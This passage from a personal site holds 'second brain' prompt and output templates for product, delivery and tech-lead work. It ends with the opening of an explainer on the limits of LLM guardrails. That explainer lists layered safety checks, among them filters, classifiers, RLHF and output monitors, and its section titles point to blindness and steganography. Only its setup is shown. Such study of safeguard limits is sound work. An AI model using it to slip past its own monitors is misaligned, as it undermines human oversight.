- [ ] Logging added for debugging
- [ ] Monitoring/alerting updated
### Rollback Safety
- [ ] Rollback plan documented
- [ ] Migration is reversible (if database changes)
- [ ] Feature flag allows instant disable
- [ ] Previous version can run in parallel if needed
```
### ReAct Pattern Reference
- **THINK**: What is the constraint here? Analyze the problem space, map dependencies, identify what could break.
- **ACT**: Apply the code change. Show the concrete diff or implementation stub.
- **OBSERVE**: How do we verify? List the test commands, metrics, and success criteria.

### When to use this skill vs. your IDE
| Task | Use IDE | Use This Skill |
|------|---------|----------------|
| Syntax autocomplete | ✓ | |
| Quick bug fix | ✓ | |
| Migrate framework | | ✓ |
| Refactor large component | | ✓ |
| New feature matching patterns | | ✓ |
| Root cause debugging | | ✓ |
| Architecture code review | | ✓ |
#### skill spec

```
---
name: po-second-brain
version: 1.0
description: Requirements capture, sprint planning, stakeholder communication, roadmap prioritization
patterns: [spec-kit, Given/When/Then, value-effort-risk scoring]
---
```
## PO / PM Second Brain

Gathers context about stakeholders, constraints, and success criteria before generating requirements, sprint backlogs, or roadmaps — never guesses.

Context is everything · Structure gets rewarded · You are the retrieval system

### When to use each scenario
#### A — Requirements Capture
"We need to document requirements for our new feature" → User stories with Given/When/Then, priority ranking, dependency mapping, edge cases.
#### B — Sprint Planning
"Help me plan the next 2-week sprint" → Sprint backlog with estimates, capacity check, dependency graph, burn-down projections.
#### C — Stakeholder Communication
"I need a status report for exec leadership" → Executive summary, progress metrics, risks with mitigation, asks with clear impact statements.
#### D — Roadmap Planning
"We have 15 features to prioritize for Q2–Q3" → Ranked roadmap with rationale, resource allocation, timeline projections, risk adjustments.

### Interrogation Framework (23 questions · 5 phases)
#### Phase 1 — Business Context (Q1–6)
- **Company / Product**: What are we building? SaaS, internal tool, mobile app?
- **Business Goal**: North star metric — revenue, retention, cost savings, efficiency?
- **Current State**: How is this done today? Manual, competitor, legacy?
- **Success Definition**: Metrics, adoption, feedback that signals success?
- **Stakeholders**: Executive sponsor, users, customers, team leads?
- **Timeline**: Hard deadline, flexible, market window?
#### Phase 2 — Scope & Requirements (Q7–12)
- **Scope Statement**: What is in scope, what is out? MVP vs. future?
- **Primary Users**: Customer, internal, both?
- **Key Workflows**: 3–4 critical user flows?
- **Constraints**: Non-negotiable technology, budget, compliance?
- **Dependencies**: Other projects or systems this depends on?
- **Known Unknowns**: Risks or uncertainties?
#### Phase 3 — Team & Capacity (Q13–16)
- **Team Size**: Developers, designers, QA?
- **Team Experience**: Domain familiarity?
- **Existing Patterns**: Tech stack, design patterns?
- **Velocity**: Story points per sprint?
#### Phase 4 — Acceptance & Validation (Q17–20)
- **Acceptance Criteria Style**: Given/When/Then, checklist, other?
- **Definition of Done**: Code review, tests, deployment, user validation?
- **Validation Approach**: Demo, metrics, user testing?
- **Rollback Plan**: Safety net if something does not work?
#### Phase 5 — Knowledge & Decisions (Q21–23)
- **Decision Constraints**: Platform choices, compliance that limit options?
- **Tribal Knowledge**: What does every PM wish they knew about this project?
- **Competitive Intel**: How do competitors handle this?

### Starter Prompt Templates (copy and paste)

#### Prompt Template — Scenario A (Requirements Capture)
```
You are a PO/PM Second Brain using the spec-kit methodology (Knowledge → Specification → Plan → Execution).
I need to capture requirements for [FEATURE/PROJECT NAME].
Interrogate me through 5 phases before generating anything:
Phase 1: Business goal, current state, success definition, stakeholders, timeline
Phase 2: Scope (in/out), primary users, critical workflows, constraints, dependencies
Phase 3: Team size, experience, velocity
Phase 4: Acceptance criteria format, definition of done, validation approach
Phase 5: Decision constraints, tribal knowledge
Then generate:
- 3-5 user stories in Given/When/Then format
- Edge cases for each story
- Dependency map
- Priority ranking with rationale
```
#### Prompt Template — Scenario D (Roadmap Prioritization)
```
You are a PO/PM Second Brain.
I have [N] features to prioritize for [TIME HORIZON].
Ask me these questions before scoring:
1. What is the primary business goal for this period?
2. What is the team's capacity (story points per sprint, sprints available)?
3. What are the hard constraints (compliance, dependencies, deadlines)?
4. What does "high value" mean for this business? (Revenue, retention, cost savings?)
5. What are the top 3 risks we want to avoid?
Then produce a ranked roadmap using:
Priority Score = (Value × 3 + Revenue Impact) - (Effort × 2 + Risk × 1.5)
Tier 1: Launch now | Tier 2: Plan for next quarter | Tier 3: Defer
Format: table with Rank, Feature, Value, Effort, Risk, Impact, Owner, Status, Rationale
```
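The prioritization formula in the template above is easy to operationalize. A minimal sketch, assuming 1-5 scores per feature; the feature names and tier cut-offs are illustrative, not from the source:

```python
from dataclasses import dataclass

@dataclass
class Feature:
    name: str
    value: int           # business value, 1-5
    revenue_impact: int  # 1-5
    effort: int          # 1-5
    risk: int            # 1-5

def priority_score(f: Feature) -> float:
    # Priority Score = (Value x 3 + Revenue Impact) - (Effort x 2 + Risk x 1.5)
    return (f.value * 3 + f.revenue_impact) - (f.effort * 2 + f.risk * 1.5)

def tier(score: float) -> str:
    # Illustrative cut-offs (tune per portfolio)
    if score >= 8:
        return "Tier 1: Launch now"
    if score >= 4:
        return "Tier 2: Plan next quarter"
    return "Tier 3: Defer"

features = [Feature("SSO login", 5, 4, 3, 1), Feature("Dark mode", 2, 1, 2, 1)]
ranked = sorted(features, key=priority_score, reverse=True)
```

Encoding the formula this way makes the ranking reproducible: when a stakeholder disputes a priority, the argument is about the input scores, not the output order.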
### Output Templates (user story · sprint backlog · stakeholder report)

#### User Story with Acceptance Criteria
```
## User Story: [Feature Title]
**Story ID**: PROJ-123
**Sprint**: Q2 Sprint 2
**Priority**: High
**Estimate**: 8 points
### Description
As a [user type], I want to [action], so that [benefit].
### Acceptance Criteria
Given [context]
When [action]
Then [expected outcome]
Given [context]
When [action]
Then [expected outcome]
### Edge Cases
- What if [edge case A]? → [handling]
- What if [edge case B]? → [handling]
### Dependencies
- Requires [system/story] (tracked in PROJ-XXX)
### Success Criteria
- [ ] [Metric 1]
- [ ] [Metric 2]
```
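Given/When/Then criteria map mechanically onto test names, which keeps acceptance criteria traceable in test output. A small sketch in plain Python (not a BDD framework; the example clauses are hypothetical):

```python
def make_test_name(given: str, when: str, then: str) -> str:
    # Slugify each clause so the acceptance criterion is readable in test reports
    slug = lambda s: s.lower().replace(" ", "_")
    return f"test_given_{slug(given)}_when_{slug(when)}_then_{slug(then)}"

name = make_test_name("logged in user", "clicks export", "csv downloads")
```

One Given/When/Then block per test function is the usual convention; when a story has several criteria, each becomes its own named test rather than one test with many asserts.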
#### Stakeholder Status Report
```
## Q[N] Progress Report
**Period**: [Date range]
**Overall Status**: GREEN / YELLOW / RED
## Executive Summary
**The Ask**: [One ask with clear impact and cost]
## Progress Snapshot
### Completed
- [Story/feature] — [outcome metric]
### In Progress
- [Story/feature] — [% complete, on track / at risk]
## Metrics
| Metric | Target | Current | Status |
|-------------------|--------|---------|--------|
| [Metric 1] | [val] | [val] | GREEN |
| [Metric 2] | [val] | [val] | YELLOW |
## Risk Register
| Risk | Impact | Status | Owner | Mitigation |
|----------------|--------|---------|-------|-----------|
| [Risk 1] | High | Active | [name]| [plan] |
## What We Need From You
| Ask | Impact | Timeline |
|-------------------|---------------------------|------------------|
| [Decision needed] | [What slips if delayed] | [Date] |
```
#### Prioritized Roadmap
```
## Q[N]-Q[N+1] Product Roadmap
### Prioritization Formula
Priority Score = (Value × 3 + Revenue Impact) - (Effort × 2 + Risk × 1.5)
### Tier 1: Launch Now
| Rank | Feature | Value | Effort | Risk | Impact | Owner | Status |
|------|---------|-------|--------|------|--------|-------|--------|
| 1 | [name] | 5 | 3 | 1 | [why] | [who] | [%] |
### Tier 2: Plan Next Quarter
| Rank | Feature | Value | Effort | Risk | Impact | Owner | Status |
|------|---------|-------|--------|------|--------|-------|--------|
| 5 | [name] | 4 | 4 | 2 | [why] | [who] | backlog|
### Tier 3: Defer
| Rank | Feature | Reason for Deferral |
|------|---------|---------------------|
| 9 | [name] | Low demand, high complexity |
```
#### skill spec

```
---
name: dl-second-brain
version: 1.0
description: Priority building, team scaling, client status reporting, delivery risk assessment
patterns: [ABCD-priorities, RAG-status, risk-matrix, onboarding-plan]
---
```
## Delivery Lead Second Brain

Gathers rich context about team, client, project, and business before generating strategies. Output is matrices, CSV exports, and checklists — not narratives.

Context is everything · Structure gets rewarded · You are the retrieval system

### When to use each scenario
#### A — Priority Building
"I need to build priorities for Q1 and Q2" → 3–5 priorities in CSV format with ABCD reflections, metrics, resource mapping.
#### B — Team Scaling
"I am onboarding 3 new engineers" → Phased onboarding plan, ADR template, knowledge-base structure.
#### C — Client Status Reporting
"I need to report to steering committee" → RAG status summary, milestone tracker, risk escalation, client asks, next-week plan.
#### D — Risk Assessment
"Too many risks, need a systematic approach" → Risk matrix with impact/probability, mitigation strategies, owners and timelines.

### Interrogation Framework (17 questions · 4 phases)
#### Phase 1 — Team & Project Context (Q1–6)
- **Team Composition**: How many people? Roles? Remote or co-located? Time zones?
- **Project Budget**: Total contract value? Burn rate? Contingency?
- **Project Scope**: 3–5 main deliverables? Timeline to completion?
- **Success Metrics**: How does the client measure success? KPIs?
- **Delivery Methodology**: Agile, waterfall, hybrid? Sprint length?
- **Current Phase**: Discovery, build, testing, launch, sustain?
#### Phase 2 — Client & Stakeholder Dynamics (Q7–10)
- **Client Stakeholder Map**: Who makes decisions? Data-driven, political, or consensus style?
- **Relationship Health**: Client satisfaction level? Any tensions or escalations?
- **Client Team**: Are they embedded? Do they have capacity to review/approve?
- **Change Management**: How resistant is the org to the change you are delivering?
#### Phase 3 — Risk & Dependencies (Q11–14)
- **Known Risks**: What keeps you up at night? Top 3 risk items?
- **Dependencies**: What is blocking progress? External dependencies?
- **Escalation Paths**: Who do you escalate to? Decision timeline?
- **Resource Constraints**: Skills gaps, competing priorities?
#### Phase 4 — Organizational Context (Q15–17)
- **Portfolio Context**: How does this fit the broader program/portfolio?
- **Organizational Readiness**: Is the org ready for this change?
- **Tribal Knowledge**: What does every DL wish they knew about this type of project?

### Starter Prompt Templates (copy and paste)

#### Prompt Template — Scenario A (Priority Building with ABCD)
```
You are a Delivery Lead Second Brain.
I need to build FY priorities for [PROGRAM/PROJECT NAME].
Before generating anything, ask me:
Phase 1: Team composition, budget, deliverables, success metrics, methodology, current phase
Phase 2: Stakeholder map, relationship health, client capacity, change management
Phase 3: Top 3 risks, blocking dependencies, escalation paths
Phase 4: Portfolio context, org readiness, tribal knowledge
Then generate:
- 3-5 priorities in CSV format using ABCD columns:
Priority, Action, Behavior, Context, Delivered, Owner, Timeline, Metrics, Notes
- Strategic narrative for steering committee
- Risk matrix (top 5 risks with Impact, Probability, Mitigation, Owner)
- Execution checklist by quarter
```
#### Prompt Template — Scenario C (Weekly Status Report)
```
You are a Delivery Lead Second Brain.
I need to write a weekly status report for [PROJECT NAME] to send to [AUDIENCE].
Ask me:
1. What is the overall status? GREEN / YELLOW / RED — and why?
2. What milestones were supposed to happen this week? What happened?
3. What are the top 3 achievements?
4. What risks have escalated or changed since last week?
5. What do you need the client/leadership to decide or action this week?
6. What is the specific plan for next week?
Then generate a ready-to-send status report with:
- Executive summary (2 sentences)
- Milestone tracker (RAG table)
- Achievements this week
- Risks & escalations (with specific impact if not resolved)
- Next week plan
- Client asks with deadlines
```
### Output Templates (ABCD CSV · status report · risk matrix · onboarding plan)

#### Priority Building — ABCD CSV Format
```
Priority,Action,Behavior,Context,Delivered,Owner,Timeline,Metrics,Notes
"Q1 Foundation","[what you are doing]","[how — quality, coverage, standards]","[why it matters — business impact]","[what success looks like]","[owner]","[dates]","[measurable metrics]","[dependencies, risks]"
"Q2 Adoption","[what you are doing]","[how — quality, coverage, standards]","[why it matters — business impact]","[what success looks like]","[owner]","[dates]","[measurable metrics]","[dependencies, risks]"
```
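If you maintain these rows programmatically, the stdlib `csv` module handles the quoting for you. A sketch with hypothetical row values (the field names match the template above):

```python
import csv
import io

FIELDS = ["Priority", "Action", "Behavior", "Context", "Delivered",
          "Owner", "Timeline", "Metrics", "Notes"]

rows = [{
    "Priority": "Q1 Foundation",
    "Action": "Stand up CI/CD for all services",
    "Behavior": "Automated quality gates, 80% coverage",
    "Context": "Reduces release risk for client launch",
    "Delivered": "One-click deploys by end of Q1",
    "Owner": "DL",
    "Timeline": "Jan-Mar",
    "Metrics": "Deploy frequency, change failure rate",
    "Notes": "Depends on cloud access approval",
}]

buf = io.StringIO()
writer = csv.DictWriter(buf, fieldnames=FIELDS, quoting=csv.QUOTE_ALL)
writer.writeheader()
writer.writerows(rows)
csv_text = buf.getvalue()
```

`QUOTE_ALL` keeps embedded commas in the free-text columns (Behavior, Notes) from breaking the format.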
#### Weekly Status Report
```
## Weekly Status Report: [Project Name]
**Week of**: [Date]
**Overall Status**: GREEN / YELLOW / RED
### 1. Milestone Tracker
| Deliverable | Target Date | Status | Progress | Notes |
|-----------------|------------|--------|----------|-------|
| [Milestone 1] | [date] | GREEN | 100% | [note]|
| [Milestone 2] | [date] | YELLOW | 65% | [risk]|
### 2. Key Achievements This Week
- [Achievement 1]
- [Achievement 2]
### 3. Risks & Escalations
**ESCALATION NEEDED**: [Risk description]
- **Impact**: [What slips if not resolved]
- **Mitigation in progress**: [What is being done]
- **Ask**: [Specific decision or action needed]
### 4. Next Week's Plan
- [ ] [Action 1]
- [ ] [Action 2]
### 5. Client Asks / Open Items
| Ask | Owner | Status | Timeline |
|---------|---------|----------|----------|
| [ask 1] | [client]| Pending | [date] |
```
#### Risk Assessment Matrix

```
| Risk | Probability | Impact | Score | Mitigation | Owner | Timeline |
|---------------------------|-------------|--------|-------|----------------------------|--------|----------|
| [Key vendor delay] | Medium | High | 6 | Build contingency layer | [name] | Week 1 |
| [Scope creep] | High | High | 9 | Change control board | [name] | Immediate|
| [Team capacity — testing] | Medium | High | 6 | Hire contract QA for wk 8 | [name] | Week 4 |
Score = Probability (1-3) × Impact (1-3)
```
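The Score column follows the stated formula (Probability × Impact, each on a 1-3 scale). A minimal sketch that scores and ranks the example risks:

```python
def risk_score(probability: int, impact: int) -> int:
    """Score = Probability (1-3) x Impact (1-3)."""
    assert 1 <= probability <= 3 and 1 <= impact <= 3
    return probability * impact

LEVELS = {"Low": 1, "Medium": 2, "High": 3}

risks = [
    ("Key vendor delay", "Medium", "High"),
    ("Scope creep", "High", "High"),
    ("Team capacity — testing", "Medium", "High"),
]

# Rank risks by score, highest first
scored = sorted(
    ((name, risk_score(LEVELS[p], LEVELS[i])) for name, p, i in risks),
    key=lambda r: r[1],
    reverse=True,
)
```

The multiplicative score deliberately pushes high/high items to the top of the register, which is where the escalation conversation should start.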
#### Team Onboarding Plan
```
## Onboarding Plan: [New Team Member]
### Phase 1: Week 1 — Foundation
| Day | Activity | Owner | Duration |
|-------|----------------------------------------------|----------|----------|
| 1 | Project mission, scope, success criteria | [DL] | 2h |
| 1 | Meet core team + role clarity | [PM] | 1h |
| 2 | Client context + stakeholder map | [AE] | 1.5h |
| 2 | Current phase deep-dive + blockers | [TL] | 2h |
| 3 | Documentation review (plan, ADRs, design docs)| Self | 3h |
| 4-5 | Shadow team ceremonies | [Team] | 5h |
### Phase 1 Checkpoint
- [ ] Can articulate project goal in 2 sentences
- [ ] Knows all core team members and roles
- [ ] Understands current phase and top 3 blockers
- [ ] Attended at least 3 ceremonies
### Phase 3: Week 4-6 — First Real Task
- Assigned task has clear success criteria
- Mentor reviews work before integration
- Autonomy increases over time
```
#### skill spec

```
---
name: tl-second-brain
version: 1.0
description: ADRs, metaprompting, technical spike planning, team technical standards
patterns: [Tree-of-Thoughts, ADR, metaprompt, cursorrules]
---
```
## Tech Lead Second Brain

Guides architectural decisions through Tree of Thoughts (GENERATE→EVALUATE→DECIDE), builds metaprompts for team amplification, and codifies standards as .cursorrules.

Context is everything · Structure gets rewarded · You are the retrieval system

### When to use each scenario
#### A — Architecture Decision Record
"Should we decompose our monolith or use strangler fig?" → 3 options via Tree of Thoughts, ADR document, implementation roadmap.
#### B — Metaprompting
"I need each engineer to get role-specific architecture guidance" → Metaprompt with backend/DevOps/QA/security role branches, usage examples.
#### C — Technical Spike Planning
"Should we migrate to Kubernetes? Need data before committing" → Spike plan with investigation phases, success criteria, decision gates, time-box.
#### D — Team Technical Standards
"Our async/await patterns are inconsistent across the team" → .cursorrules file with patterns, anti-patterns, examples, rationale.

### Interrogation Framework (17 questions · 4 phases)
#### Phase 1 — Current Architecture (Q1–6)
- **Current System Design**: Monolith, microservices, event-driven, hybrid?
- **Technology Stack**: Languages, frameworks, databases, message queues, versions?
- **Scale Context**: Transactions/sec? Users? Data volume? Growth rate?
- **Team Size & Skills**: How many engineers? Key expertise areas? Skill gaps?
- **Operational Maturity**: CI/CD, monitoring, on-call model?
- **Technical Debt**: Biggest pain point? What slows down development?
#### Phase 2 — Target State & Constraints (Q7–10)
- **Strategic Goal**: What problem are we solving? Business driver?
- **Success Metrics**: Latency, throughput, developer velocity?
- **Hard Constraints**: Budget, timeline, compliance, team availability?
- **Integration Requirements**: Other systems that must integrate?
#### Phase 3 — Organizational Context (Q11–14)
- **Team Maturity**: Can the team handle microservices, distributed systems, new frameworks?
- **Appetite for Change**: How much disruption is acceptable?
- **Support & Tooling**: What infrastructure already exists?
- **Decision Authority**: Who decides? What is the approval process?
#### Phase 4 — Risk & Knowledge (Q15–17)
- **Similar Decisions**: Have we done something like this before?
- **Hidden Risks**: What keeps you up at night about this decision?
- **Decision Timeline**: When does this need to be made? How long to implement?

### Starter Prompt Templates (copy and paste)

#### Prompt Template — Scenario A (ADR with Tree of Thoughts)
```
You are a Tech Lead Second Brain using Tree of Thoughts (GENERATE→EVALUATE→DECIDE).
I need an Architecture Decision Record for: [DECISION QUESTION]
Before generating options, interrogate me through 4 phases:
Phase 1: Current architecture, tech stack, scale, team composition, tech debt
Phase 2: Strategic goal, success metrics, hard constraints, integration requirements
Phase 3: Team maturity, change appetite, existing tooling, decision authority
Phase 4: Prior similar decisions, risks, decision timeline
Then generate:
ADR-NNN with:
- Context (problem statement, constraints, success criteria)
- 3 fundamentally different options (not variations on one idea)
Each option: THINK (how it works) → EVALUATE (pros/cons/risks)
- Decision with clear rationale (which constraint it best fits)
- Consequences (positive, negative, action items with timeline)
```
#### Prompt Template — Scenario B (Metaprompt Generation)
```
You are a Tech Lead Second Brain.
I want a metaprompt for [ARCHITECTURE TOPIC — e.g., "caching strategy design"].
The metaprompt should, when given to any team member, generate role-specific guidance.
Ask me:
1. What is the architectural decision or topic?
2. What are the performance targets and constraints?
3. What roles need different guidance? (Backend, DevOps, QA, Security?)
4. What are the team's existing patterns I want to enforce?
5. What are the top 3 anti-patterns we want to prevent?
Then generate a metaprompt that includes:
- Primary mission (what the role should produce)
- Interrogation questions the role must answer first
- Role-specific generation sections (one per role)
- Rationale section explaining key trade-offs
```
#### Prompt Template — Scenario D (.cursorrules Team Standards)
```
You are a Tech Lead Second Brain.
I need a .cursorrules file for [PROJECT/TEAM NAME].
Ask me:
1. What is the one-sentence vision for our architecture?
2. What are the 3-4 most critical patterns to enforce? (async/await, error handling, logging, service contracts?)
3. For each pattern: what does the team do WRONG today?
4. For each pattern: what does the CORRECT implementation look like?
5. What are the top 3 anti-patterns you keep seeing in code review?
6. Under what conditions can engineers break these patterns?
Then generate a .cursorrules file with:
- Vision statement
- Core patterns (each with PATTERN code example and ANTI-PATTERN code example)
- Code review checklist
- When to break the rules (explicit conditions)
```
### Output Templates (ADR · spike plan · .cursorrules)

#### Architecture Decision Record (ADR)
```
## ADR-NNN: [Decision Title]
### Context
- **Problem Statement**: What decision are we making and why?
- **Constraints**: Timeline, budget, team size, technical/organizational limits
- **Success Criteria**: How will we measure if this was the right choice?
### Options (Tree of Thoughts)
#### Option A: [Approach Name]
**THINK**: How would this work? (architecture sketch)
**EVALUATE**:
Pros:
- [pro 1]
Cons:
- [con 1]
Risks:
- [ ] High: [risk]
- [ ] Medium: [risk]
#### Option B: [Approach Name]
[same structure]
#### Option C: [Approach Name]
[same structure]
### Decision
**CHOOSE**: Option [A/B/C]
**Rationale**: Best fits [constraint]. Team capability: [assessment]. Risk profile: [acceptable risks].
### Consequences
#### Positive
- [benefit 1]
#### Negative
- [trade-off 1]
#### Action Items
- [ ] [Action] — [Owner] — [Date]
```
#### Technical Spike Plan
```
## Technical Spike: [Investigation Topic]
### Objective
**Question**: Should we migrate to [technology/pattern]?
**Time-box**: [1-2 weeks]
**Success Criteria**:
- [ ] Proof-of-concept running
- [ ] Performance benchmarks vs. current system
- [ ] Team impact assessment (learning curve, hiring needs)
- [ ] 3-year cost/benefit analysis
- [ ] Risk mitigation strategy documented
### Decision Gates
| Gate | Criteria | Owner | Target |
|-----------------|---------------------------------------|-------------|--------|
| POC Success | POC runs on developer laptop | [Engineer] | Day 3 |
| Performance | Meets latency targets | [Engineer] | Day 6 |
| Team Fit | Learning curve acceptable | [TL] | Day 7 |
| Financial | 3-year TCO justifies migration cost | [PM] | Day 8 |
### Explicitly Not in Scope
- Full migration plan
- Integration with all downstream systems
- Vendor negotiation
```
#### .cursorrules — Team Standards File
```
# .cursorrules — Team Technical Standards for [Project]
## Vision
[1 sentence: "We are an async-first microservices team that values observable deployments."]
## Core Patterns
### 1. Async/Await
# PATTERN
async def get_user(user_id: int):
    # Parameterized query; never interpolate user input into SQL
    user = await db.query("SELECT * FROM users WHERE id = %s", user_id)
    return user
# ANTI-PATTERN
def get_user(user_id: int):  # Blocks request thread
    return requests.get(f"https://userapi.com/{user_id}")
### 2. Error Handling
# PATTERN — Named exceptions with full context
class PaymentProcessingError(Exception):
    def __init__(self, user_id: int, amount: float, reason: str): ...
# ANTI-PATTERN
except Exception as e:
    logger.error(f"Error: {e}")  # No context!
### 3. Logging
# PATTERN — Structured JSON, always queryable
logger.info("order_created", extra={"order_id": order.id, "amount": order.total})
# ANTI-PATTERN
logger.info(f"Order {order.id} created") # Not queryable
## Code Review Checklist
- [ ] No synchronous I/O in async functions
- [ ] All exceptions named and contextual
- [ ] Logging is structured JSON
- [ ] Service boundaries clear (input/output contracts)
- [ ] Tests cover happy path + at least 2 error scenarios
- [ ] Type hints on all function signatures
## When to Break These Patterns
Only with explicit TL approval and documented rationale.
File issue: `patterns: [pattern-name]: [reason for exception]`
```
### Tree of Thoughts Pattern Reference
- **GENERATE**: What are 3 fundamentally different approaches? Not variations — genuinely different options that each solve the problem in a distinct way.
- **EVALUATE**: For each option: pros, cons, and risks. Be honest about trade-offs. Prevent premature convergence on the familiar option.
- **DECIDE**: Which option best balances constraints and team capabilities? State rationale explicitly. Acknowledge which risks you are accepting.

#### skill spec

```
---
name: make-skills
version: 1.0
description: Capstone — turn your repeated work into a production-ready interrogation-driven skill
phases: [task-discovery, pattern-extraction, skill-generation]
output: SKILL.md file you can save and use immediately
---
```
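The GENERATE→EVALUATE→DECIDE loop can be sketched in a few lines. The options, scoring weights, and risk scale here are hypothetical; real evaluation is the model's prose reasoning, not a formula:

```python
from dataclasses import dataclass

@dataclass
class Option:
    name: str
    pros: list[str]
    cons: list[str]
    risk: int  # 1 (low) to 3 (high)

def evaluate(opt: Option) -> float:
    # EVALUATE: naive score: pros minus cons, penalized by risk
    return len(opt.pros) - len(opt.cons) - 0.5 * opt.risk

def decide(options: list[Option]) -> Option:
    # DECIDE: pick the best-scoring option; keep the rationale explicit
    return max(options, key=evaluate)

# GENERATE: three fundamentally different approaches (hypothetical)
options = [
    Option("Strangler fig", ["incremental", "reversible"], ["slow"], 1),
    Option("Big-bang rewrite", ["clean slate"], ["risky", "long feature freeze"], 3),
    Option("Modular monolith", ["low ops cost", "fast to ship"], ["defers the split"], 2),
]
choice = decide(options)
```

The structural point survives the toy scoring: forcing three distinct options into existence before any scoring happens is what prevents premature convergence on the familiar choice.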
## Make Skills — Capstone

Stop using skills. Start building them. A 3-phase workflow that extracts the pattern hidden in your weekly work and turns it into a reusable AI workflow.

Context is everything · Structure gets rewarded · You are the retrieval system

**The Capstone Reveal** — After you generate your first skill you will see: it ASKS questions (retrieval), it ASSEMBLES your answers into structured context (augmentation), it FEEDS that context to the AI for generation (generation). You just built a RAG system. Every skill is a RAG system.

### When to build a skill
#### A — Repeatable Document Creation
"I create [documents] at least weekly" → Sales decks, RFP responses, project briefs, technical specs.
#### B — Code Generation or Migration
"I build [code structures] repeatedly" → Microservice scaffolding, API contract implementation, database migration planning.
#### C — Analysis or Decision Support
"I analyze [situations] and produce structured recommendations" → Architecture reviews, competitive analysis, incident post-mortems.
#### D — Communication or Planning
"I create [communications] regularly" → Meeting agendas, status reports, project proposals, email templates.

### 3-Phase Workflow (task discovery · pattern extraction · skill generation)
#### Phase 1 — Task Discovery (15 min)
- **Weekly Task**: What task do you repeat at least weekly?
- **Current Process**: Walk me through your steps today, step by step.
- **Input Requirements**: What information do you need before starting?
- **Quality Definition**: What does GOOD output look like? What does BAD look like?
- **Audience**: Who uses your output and how?
#### Phase 2 — Pattern Extraction (10 min)
- **Task Category**: Code generation, document creation, analysis, communication, or planning?
- **Context Requirements**: What 5–7 pieces of information always change but are always needed?
- **Question Design**: What questions should the skill ask to gather that context?
- **Output Structure**: What sections, ordering, and format for the output?
#### Phase 3 — Skill Generation (automatic)
- **Formatting**: Converts your answers into proper SKILL.md structure
- **Example Generation**: Creates a worked example (interrogation → output)
- **Integration Notes**: Explains how the skill connects to RAG, ReAct, and bootcamp patterns

### Starter Prompt Template (copy and paste)

#### Prompt Template — Make-Skills Capstone
```
You are a Make-Skills capstone assistant. Help me build a production-ready SKILL.md for a task I repeat at work.
Run me through 3 phases:
PHASE 1 — Task Discovery (ask all 5 questions, one at a time):
1. What task do you repeat at least weekly at work?
2. Walk me through how you do it today, step by step.
3. What information do you need to gather before you start?
4. What does GOOD output look like? What does BAD look like?
5. Who is the audience for your output?
PHASE 2 — Pattern Extraction (ask all 4 questions):
6. Which category best fits your task: code generation, document creation, analysis, communication, or planning?
7. What are 5-7 pieces of context that always change but are always needed?
8. What questions should the skill ask the user to gather that context?
9. What structure should the output follow? (section headings, ordering, format)
PHASE 3 — Generate the skill file:
Using all my answers, generate a complete SKILL.md with:
- YAML frontmatter (name, version, description)
- Overview section (what it does, 3 intuitions)
- Structured interrogation framework (formatted as phases)
- Output format specification (with template)
- Complete worked example (interrogation → output)
- Reflection: explain what the participant just built (the RAG reveal)
```
Generated Skill File Template the structure your skill will follow ▶ SKILL.md — Generated Structure Copy
```
---
name: [your-task-name]
description: [your task] interrogation-driven skill
version: 1.0
---
# [Your Skill Name]
## Overview
[Purpose, target audience, core value]
[The 3 bootcamp intuitions as they apply to your task]
## Key Capabilities
[What this skill does — derived from Phase 2 answers]
## Structured Interrogation Framework
### Phase 1: [Context gathering]
[Your questions, formatted as numbered list with bold category + question]
### Phase 2: [Structure definition]
[Your output structure requirements]
## Output Format Specification
```[your format]
[Your template with all sections filled in with examples]
```
## Example: Complete Workflow
### Interrogation Phase
[Worked example: Q1: → "answer" Q2: → "answer" ...]
### Generated Output
[Sample output your skill produces from those answers]
## Reflection: What You Just Built
- It ASKS questions → that is retrieval
- It ASSEMBLES your answers into structured context → that is augmentation
- It FEEDS that context to the AI → that is generation
You just built a RAG system. Every skill is a RAG system.
```
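The reflection above can be run as code. A minimal sketch of the ask → assemble → feed loop (the `answer` and `call_llm` stand-ins are placeholders invented for illustration, not a real API):

```python
def run_skill(questions, answer, call_llm):
    """questions: list of prompts; answer: fn(q) -> str (the user);
    call_llm: fn(prompt) -> str (the model)."""
    # Retrieval: the skill ASKS questions and collects answers
    answers = {q: answer(q) for q in questions}
    # Augmentation: it ASSEMBLES the answers into structured context
    context = "\n".join(f"- {q} {a}" for q, a in answers.items())
    # Generation: it FEEDS that context to the model
    return call_llm("Using this context, produce the output:\n" + context)

# Toy run with stand-ins for the user and the model:
out = run_skill(
    ["What task?", "Who is the audience?"],
    answer={"What task?": "weekly status report",
            "Who is the audience?": "my manager"}.get,
    call_llm=lambda prompt: prompt.upper(),  # stand-in for a real model call
)
print("WEEKLY STATUS REPORT" in out)  # True
```

Swap `call_llm` for a real model call and `answer` for interactive input, and this is the interrogation loop the capstone skill generates.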
**Should you build a skill for this task?**

| Build a skill if… | Skip skills if… |
|---|---|
| You do this at least weekly | You do it once per quarter |
| Output affects others | Output is just for you |
| It takes 30+ minutes | It takes 2 minutes (template works fine) |
| You always gather the same information | The process changes dramatically each time |
| Others could use it too | It is already fully automated |
**Skill composition: **Once you have a few skills you can chain them. Spec-generator output feeds into plan-generator, which feeds into test-strategy-generator. That is a workflow, not just a skill. Joey Lopez · 2026 · [jrlopez.dev ]()[home ]()· [bootcamp ]()· [developer ]()· [PO/PM ]()· [delivery ]()· [tech lead ]()· [make skills ]()[.md ]()
---
# guardrails-deep-dive.md
# https://jrlopez.dev/p/guardrails-deep-dive.html
---
title: "Guardrails Deep Dive"
description: "Interactive walkthrough of the proof."
author: "Joey Lopez"
date: "2025-12-10"
tags: ["security", "prompting", "teaching", "theory"]
atom_id: 3
source_html: "guardrails-deep-dive.html"
url: "https://jrlopez.dev/p/guardrails-deep-dive.html"
generated: true
---
[jrlopez.dev ]()[1. Setup ]()[2. Monoids ]()[3. Blindness ]()[4. Fano ]()[5. NP-Hard ]()[6. Functor ]()[7. Steganography ]()[8. So What? ]()
# Why LLM Guardrails Have Limits An interactive walkthrough of *"Algebraic and Computational Limits of LLM Guardrails" *— four impossibility results, step by step. Joey Lopez [Syntactic Monoids ]()[Blindness Proof ]()[Defense Strategy ]()
## 1 The Setup: How LLM Safety Works Today When you ask ChatGPT how to do something dangerous and it refuses, that refusal comes from **multiple layers of defense **stacked on top of each other. Think of it like airport security: there is not one check, but many. graph LR
A["Your Prompt"] --> B["Layer 1: Regex Filter"]
B --> C["Layer 2: Neural Classifier"]
C --> D["Layer 3: RLHF Training"]
D --> E["Layer 4: Output Monitor"]
E --> F["Response"]
style B fill:#3d1520,stroke:#e94560,color:#fff
style C fill:#152540,stroke:#58a6ff,color:#fff
